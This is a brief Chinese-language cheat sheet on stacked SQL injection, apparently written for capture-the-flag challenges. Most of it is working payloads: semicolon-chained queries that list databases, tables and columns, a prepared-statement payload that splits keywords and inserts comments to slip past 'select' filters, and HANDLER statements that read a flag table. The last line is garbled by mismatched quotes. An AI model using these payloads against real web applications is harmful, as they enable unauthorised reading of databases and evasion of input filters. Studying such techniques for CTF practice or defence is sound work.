堆叠注入
用分号可以 执行多条语句
查看所有数据库
-1';show databases
查看当前数据库下所有表名
-1';use 数据库名;show tables
查看表名下所有字段
-1';use 数据库名;show columns from 表名
flag,用预编译的方法
-1';use 数据库名;set @sql=concat('select `fl','ag` fr/**/om Fl','ag');PRE/**/PARE st/**/mt1 FR/**/OM @sql;EX/**/ECUTE stmt1;#
select被过滤,用HANDLER语句,语法
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name CLOSE
1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;#
‘select ``fl’,‘ag , from Fl’,‘ag’